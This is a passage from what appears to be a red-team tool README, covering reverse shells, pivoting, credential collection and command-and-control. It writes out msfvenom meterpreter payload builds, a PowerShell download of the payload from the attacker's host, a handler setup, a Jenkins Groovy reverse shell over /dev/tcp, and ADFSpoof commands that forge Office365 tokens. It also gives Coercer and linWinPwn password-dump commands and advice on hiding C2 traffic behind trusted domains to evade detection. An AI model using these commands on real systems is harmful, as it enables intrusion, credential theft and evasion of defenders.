dir="auto"><strong>[attacker]</strong> Generate a meterpreter shell:</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[IP] LPORT=[PORT] -f exe -o [SHELL NAME].exe msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf"><pre>msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[IP] LPORT=[PORT] -f exe -o [SHELL NAME].exe msfvenom -p linux/x86/shell/reverse_tcp LHOST=<span class="pl-k"><</span>IP<span class="pl-k">></span> LPORT=<span class="pl-k"><</span>PORT<span class="pl-k">></span> -f elf <span class="pl-k">></span> shell-x86.elf</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/193451669-ff745cf6-e103-4f7e-a266-f7f224dfbb0a.png"><img src="https://user-images.githubusercontent.com/100603074/193451669-ff745cf6-e103-4f7e-a266-f7f224dfbb0a.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><strong>[victim]</strong> Download to victim endpoint:</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="powershell "(New-Object System.Net.WebClient).Downloadfile('http://<ip>:8000/shell-name.exe','shell-name.exe')"`"><pre>powershell <span class="pl-s"><span class="pl-pds">"</span>(New-Object System.Net.WebClient).Downloadfile('http://<ip>:8000/shell-name.exe','shell-name.exe')<span class="pl-pds">"</span></span><span class="pl-s"><span class="pl-pds">`</span></span></pre></div> <p dir="auto"><strong>[attacker]</strong> Configure listener:</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp 
set LHOST your-ip set LPORT listening-port run`"><pre>use exploit/multi/handler <span class="pl-c1">set</span> PAYLOAD windows/meterpreter/reverse_tcp <span class="pl-c1">set</span> LHOST your-ip <span class="pl-c1">set</span> LPORT listening-port run<span class="pl-s"><span class="pl-pds">`</span></span></pre></div> <p dir="auto"><strong>[victim]</strong> Execute payload:</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="Start-Process "shell-name.exe"`"><pre>Start-Process <span class="pl-s"><span class="pl-pds">"</span>shell-name.exe<span class="pl-pds">"</span></span><span class="pl-s"><span class="pl-pds">`</span></span></pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/193452305-91b769a7-96c4-43d3-b3e2-6e31b3afec27.png"><img src="https://user-images.githubusercontent.com/100603074/193452305-91b769a7-96c4-43d3-b3e2-6e31b3afec27.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a>Forwarding Ports</h3><a id="user-content-forwarding-ports" class="anchor" aria-label="Permalink: 🔙Forwarding Ports" href="#forwarding-ports"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 
2.83Z"></path></svg></a></div> <p dir="auto">Sometimes, after gaining access to an endpoint, you find services that listen only on localhost. Exposing such an internal port on an external interface with socat lets you reach the service from your own machine and pivot through it. The listener below is unauthenticated and accepts connections from any source, so anyone who can reach EXTERNAL_PORT can reach the internal service: restrict who can connect to it and stop the socat process when you are done.</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="socat TCP-LISTEN:8888,fork TCP:127.0.0.1:80 & socat TCP-LISTEN:EXTERNAL_PORT,fork TCP:127.0.0.1:INTERNAL_PORT &"><pre>socat TCP-LISTEN:8888,fork TCP:127.0.0.1:80 <span class="pl-k">&</span> socat TCP-LISTEN:EXTERNAL_PORT,fork TCP:127.0.0.1:INTERNAL_PORT <span class="pl-k">&</span></pre></div> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a>Jenkins reverse shell</h3><a id="user-content-jenkins-reverse-shell" class="anchor" aria-label="Permalink: 🔙Jenkins reverse shell" href="#jenkins-reverse-shell"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">If you gain access to a Jenkins script console, running the following Groovy snippet there spawns a reverse shell from the host that executes the script (replace IP_ADDRESS and PORT with your listener).</p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/IP_ADDRESS/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) 
p.waitFor()"><pre lang="jenkins" class="notranslate"><code>r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/IP_ADDRESS/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() </code></pre></div> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/mandiant/ADFSpoof">ADFSpoof</a></h3><a id="user-content-adfspoof" class="anchor" aria-label="Permalink: 🔙ADFSpoof" href="#adfspoof"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Created by Doug Bienstock <a href="https://twitter.com/doughsec" rel="nofollow">@doughsec</a> while at Mandiant FireEye.</p> <p dir="auto">ADFSpoof has two main functions:</p> <ol dir="auto"> <li>Given the EncryptedPFX blob from the AD FS configuration database and DKM decryption key from Active Directory, produce a usable key/cert pair for token signing.</li> <li>Given a signing key, produce a signed security token that can be used to access a federated application.</li> </ol> <p dir="auto">This tool is meant to be used in conjunction with ADFSDump. 
ADFSDump runs on an AD FS server and outputs the information that you will need in order to use ADFSpoof.</p> <p dir="auto"><strong>Install:</strong></p> <p dir="auto"><strong>Note:</strong> <em>ADFSpoof requires a custom fork of the Python <code>cryptography</code> package, available <a href="https://github.com/dmb2168/cryptography">here</a>. Installing it replaces the upstream package in that Python environment, so do it in a dedicated virtualenv rather than a shared interpreter, and review or pin the fork's revision before installing it.</em></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/mandiant/ADFSpoof pip install -r requirements.txt"><pre>git clone https://github.com/mandiant/ADFSpoof pip install -r requirements.txt</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Decrypt the EncryptedPFX and write to disk python ADFSpoof.py -b EncryptedPfx.bin DKMkey.bin dump # Generate a security token for Office365 python ADFSpoof.py -b EncryptedPfx.bin DkmKey.bin -s sts.doughcorp.com o365 --upn robin@doughcorp.co --objectguid {1C1D4BA4-B513-XXX-XXX-3308B907D759"><pre><span class="pl-c"><span class="pl-c">#</span> Decrypt the EncryptedPFX and write to disk</span> python ADFSpoof.py -b EncryptedPfx.bin DKMkey.bin dump <span class="pl-c"><span class="pl-c">#</span> Generate a security token for Office365</span> python ADFSpoof.py -b EncryptedPfx.bin DkmKey.bin -s sts.doughcorp.com o365 --upn robin@doughcorp.co --objectguid {1C1D4BA4-B513-XXX-XXX-3308B907D759</pre></div> <p dir="auto"><strong>Note:</strong> The key/cert pair that <code>dump</code> writes to disk is the organisation's AD FS token-signing key: whoever holds it can mint tokens for any federated user. Treat it as the most sensitive artifact of the engagement, keep it encrypted at rest, and destroy it when the engagement ends.</p> <p dir="auto">Full usage information can be found <a href="https://github.com/mandiant/ADFSpoof#usage">here</a>.</p> <p dir="auto">Additional command examples can be found <a href="https://github.com/mandiant/ADFSpoof#examples">here</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/211530527-02e63fe3-5dda-4a81-8895-c140aec4eeca.png"><img 
src="https://user-images.githubusercontent.com/100603074/211530527-02e63fe3-5dda-4a81-8895-c140aec4eeca.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/mandiant/ADFSpoof#usage">https://github.com/mandiant/ADFSpoof#usage</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/p0dalirius/Coercer">Coercer</a></h3><a id="user-content-coercer" class="anchor" aria-label="Permalink: 🔙Coercer" href="#coercer"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.</p> <p dir="auto">Features:</p> <ul dir="auto"> <li>Lists open SMB pipes on the remote machine (in modes scan authenticated and fuzz authenticated)</li> <li>Tries to connect on a list of known SMB pipes on the remote machine (in modes scan unauthenticated and fuzz unauthenticated)</li> <li>Calls one by one all the vulnerable RPC functions to coerce the server to authenticate on an arbitrary machine.</li> <li>Random UNC paths generation to avoid caching failed attempts (all modes)</li> <li>Configurable delay between attempts with --delay</li> </ul> <p dir="auto">More feature information <a 
href="https://github.com/p0dalirius/Coercer#features">here</a>.</p> <p dir="auto"><strong>Install: (pip)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="sudo python3 -m pip install coercer"><pre>sudo python3 -m pip install coercer</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Scan mode (Assess the Remote Procedure Calls listening on a machine) ./Coercer.py scan -t 192.168.1.1 -u 'username' -p 'password' -d test.locl -v # Coerce mode (Exploit the Remote Procedure Calls on a remote machine to coerce an authentication to ntlmrelay or responder) ./Coercer.py coerce -l 192.168.1.2 -t 192.168.1.1 -u 'username' -p 'password' -d test.locl -v # Fuzz mode (Fuzz Remote Procedure Calls listening on a machine) ./Coercer.py fuzz -t 192.168.1.1 -u 'username' -p 'password' -d test.locl -v"><pre><span class="pl-c"><span class="pl-c">#</span> Scan mode (Assess the Remote Procedure Calls listening on a machine)</span> ./Coercer.py scan -t 192.168.1.1 -u <span class="pl-s"><span class="pl-pds">'</span>username<span class="pl-pds">'</span></span> -p <span class="pl-s"><span class="pl-pds">'</span>password<span class="pl-pds">'</span></span> -d test.locl -v <span class="pl-c"><span class="pl-c">#</span> Coerce mode (Exploit the Remote Procedure Calls on a remote machine to coerce an authentication to ntlmrelay or responder)</span> ./Coercer.py coerce -l 192.168.1.2 -t 192.168.1.1 -u <span class="pl-s"><span class="pl-pds">'</span>username<span class="pl-pds">'</span></span> -p <span class="pl-s"><span class="pl-pds">'</span>password<span class="pl-pds">'</span></span> -d test.locl -v <span class="pl-c"><span class="pl-c">#</span> Fuzz mode (Fuzz Remote Procedure Calls listening on a machine)</span> ./Coercer.py fuzz -t 192.168.1.1 -u <span 
class="pl-s"><span class="pl-pds">'</span>username<span class="pl-pds">'</span></span> -p <span class="pl-s"><span class="pl-pds">'</span>password<span class="pl-pds">'</span></span> -d test.locl -v</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/216737001-3195a6c4-3d41-431d-88ce-ed35ed474d33.png"><img src="https://user-images.githubusercontent.com/100603074/216737001-3195a6c4-3d41-431d-88ce-ed35ed474d33.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/p0dalirius/Coercer#quick-start">https://github.com/p0dalirius/Coercer#quick-start</a></em></p> <div class="markdown-heading" dir="auto"><h1 tabindex="-1" class="heading-element" dir="auto">Collection</h1><a id="user-content-collection" class="anchor" aria-label="Permalink: Collection" href="#collection"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/BloodHoundAD/BloodHound">BloodHound</a></h3><a id="user-content-bloodhound" class="anchor" aria-label="Permalink: 🔙BloodHound" href="#bloodhound"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path 
d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">An application used to visualize active directory environments. A quick way to visualise attack paths and understand victims' active directory properties.</p> <p dir="auto"><strong>Install:</strong> <a href="https://www.pentestpartners.com/security-blog/bloodhound-walkthrough-a-tool-for-many-tradecrafts/" rel="nofollow">PenTestPartners Walkthrough</a></p> <p dir="auto"><strong>Custom Queries:</strong> <a href="https://github.com/CompassSecurity/BloodHoundQueries">CompassSecurity BloodHoundQueries</a></p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/206549387-a63e5f0e-aa75-47f6-b51a-942434648ee2.png"><img src="https://user-images.githubusercontent.com/100603074/206549387-a63e5f0e-aa75-47f6-b51a-942434648ee2.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/SnaffCon/Snaffler">Snaffler</a></h3><a id="user-content-snaffler" class="anchor" aria-label="Permalink: 🔙Snaffler" href="#snaffler"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 
0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Snaffler is an advanced credential scanner/collector for Active Directory environments. <em>With a great <a href="https://github.com/SnaffCon/Snaffler/blob/master/README.md">README</a></em>.</p> <p dir="auto">Snaffler uses a system of "classifiers", each of which examines shares, folders, files or file contents, passing some items downstream to the next classifier and discarding others. Each classifier uses a set of rules to decide what to do with the items it classifies.</p> <p dir="auto"><em>More information about Snaffler <a href="https://github.com/SnaffCon/Snaffler#i-am-a-mighty-titan-of-tedium-a-master-of-the-mundane-i-wish-to-write-my-own-ruleset">rules</a>.</em></p> <p dir="auto">'<em>Broadly speaking - it gets a list of Windows computers from Active Directory, then spreads out its snaffly appendages to them all to figure out which ones have file shares, and whether you can read them.</em>' - Snaffler README (2023)</p> <p dir="auto"><strong>Install:</strong></p> <p dir="auto">You can download the binary from the <a href="https://github.com/SnaffCon/Snaffler/releases">GitHub Releases Page</a>.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Targeted local scan (less likely to trigger detections) Snaffler.exe -s -i C:\ # Go in loud and find everything snaffler.exe -s -o snaffler.log"><pre><span class="pl-c"><span class="pl-c">#</span> Targeted local scan (less likely to trigger detections)</span> Snaffler.exe -s -i C:\ <span class="pl-c"><span 
class="pl-c">#</span> Go in loud and find everything</span> snaffler.exe -s -o snaffler.log</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210266420-a658a48e-2945-4d06-9aff-e3fb14664829.png"><img src="https://user-images.githubusercontent.com/100603074/210266420-a658a48e-2945-4d06-9aff-e3fb14664829.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/SnaffCon/Snaffler#what-does-it-look-like">https://github.com/SnaffCon/Snaffler#what-does-it-look-like</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/lefayjey/linWinPwn">linWinPwn</a></h3><a id="user-content-linwinpwn" class="anchor" aria-label="Permalink: 🔙linWinPwn" href="#linwinpwn"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">linWinPwn is a bash script that automates a number of Active Directory enumeration and vulnerability checks.</p> <p dir="auto">The script uses a number of tools and serves as a wrapper around them. 
Tools include: impacket, bloodhound, crackmapexec, enum4linux-ng, ldapdomaindump, lsassy, smbmap, kerbrute, adidnsdump, certipy, silenthound, and others.</p> <p dir="auto">linWinPwn is particularly useful when you have access to an Active Directory environment for a limited time only, and you wish to automate the enumeration process and collect evidence efficiently.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/lefayjey/linWinPwn cd linWinPwn; chmod +x linWinPwn.sh chmod +x install.sh ./install.sh"><pre>git clone https://github.com/lefayjey/linWinPwn <span class="pl-c1">cd</span> linWinPwn<span class="pl-k">;</span> chmod +x linWinPwn.sh chmod +x install.sh ./install.sh</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Default: interactive - Open interactive menu to run checks separately ./linWinPwn.sh -t <Domain_Controller_IP> [-d <AD_domain> -u <AD_user> -p <AD_password_or_hash[LM:NT]_or_kerbticket[./krb5cc_ticket]> -o <output_dir>] # Auto config - Run NTP sync with target DC and add entry to /etc/hosts before running the modules ./linWinPwn.sh -t <Domain_Controller_IP> --auto-config # LDAPS - Use LDAPS instead of LDAP (port 636) ./linWinPwn.sh -t <Domain_Controller_IP> --ldaps # Module pwd_dump: Password Dump ./linWinPwn.sh -t <Domain_Controller_IP> -M pwd_dump [-d <AD_domain> -u <AD_user> -p <AD_password_or_hash[LM:NT]_or_kerbticket[./krb5cc_ticket]> -o <output_dir>]"><pre><span class="pl-c"><span class="pl-c">#</span> Default: interactive - Open interactive menu to run checks separately</span> ./linWinPwn.sh -t <span class="pl-k"><</span>Domain_Controller_IP<span class="pl-k">></span> [-d <span class="pl-k"><</span>AD_domain<span class="pl-k">></span> 
<span class="pl-k">-u</span> <span class="pl-k"><</span>AD_user<span class="pl-k">></span> <span class="pl-k">-p</span> <span class="pl-k"><</span>AD_password_or_hash[LM:NT]_or_kerbticket[./krb5cc_ticket]<span class="pl-k">></span> <span class="pl-k">-o</span> <span class="pl-k"><</span>output_dir<span class="pl-k">></span>] <span class="pl-c"><span class="pl-c">#</span> Auto config - Run NTP sync with target DC and add entry to /etc/hosts before running the modules</span> ./linWinPwn.sh -t <span class="pl-k"><</span>Domain_Controller_IP<span class="pl-k">></span> --auto-config <span class="pl-c"><span class="pl-c">#</span> LDAPS - Use LDAPS instead of LDAP (port 636)</span> ./linWinPwn.sh -t <span class="pl-k"><</span>Domain_Controller_IP<span class="pl-k">></span> --ldaps <span class="pl-c"><span class="pl-c">#</span> Module pwd_dump: Password Dump</span> ./linWinPwn.sh -t <span class="pl-k"><</span>Domain_Controller_IP<span class="pl-k">></span> -M pwd_dump [-d <span class="pl-k"><</span>AD_domain<span class="pl-k">></span> <span class="pl-k">-u</span> <span class="pl-k"><</span>AD_user<span class="pl-k">></span> <span class="pl-k">-p</span> <span class="pl-k"><</span>AD_password_or_hash[LM:NT]_or_kerbticket[./krb5cc_ticket]<span class="pl-k">></span> <span class="pl-k">-o</span> <span class="pl-k"><</span>output_dir<span class="pl-k">></span>]</pre></div> <p dir="auto">Full usage information <a href="https://github.com/lefayjey/linWinPwn#usage">here</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/216737032-57ceff01-2606-474d-a745-b39fb4997ea1.png"><img src="https://user-images.githubusercontent.com/100603074/216737032-57ceff01-2606-474d-a745-b39fb4997ea1.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/lefayjey/linWinPwn#demos">https://github.com/lefayjey/linWinPwn#demos</a></em></p> <div class="markdown-heading" 
dir="auto"><h1 tabindex="-1" class="heading-element" dir="auto">Command and Control</h1><a id="user-content-command-and-control" class="anchor" aria-label="Permalink: Command and Control" href="#command-and-control"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://lots-project.com/" rel="nofollow">Living Off Trusted Sites Project</a></h3><a id="user-content-living-off-trusted-sites-project" class="anchor" aria-label="Permalink: 🔙Living Off Trusted Sites Project" href="#living-off-trusted-sites-project"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">C2 implants can be detected by defenders looking for 
unusual network traffic to uncommon domains. Additionally proxy solutions can sometimes block connections to untrusted domains.</p> <p dir="auto">Being able to hide your C2 traffic via a trusted domain will help you to stay undetected and reduce the likelihood of being blocked at the proxy level by security solutions.</p> <p dir="auto">This resource contains a list of trusted sites that can be used.</p> <p dir="auto"><strong>Usage:</strong></p> <p dir="auto">Visit <a href="https://lots-project.com/" rel="nofollow">https://lots-project.com/</a></p> <p dir="auto">Search for <code>+C&C</code> in the search bar to view all potential domains / subdomains that can be used for command and control operations.</p> <p dir="auto">Results include:</p> <ul dir="auto"> <li>raw.githubusercontent.com</li> <li>docs.google.com</li> <li>*.azurewebsites.net</li> <li>dropbox.com</li> <li>*.amazonaws.com</li> </ul> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" 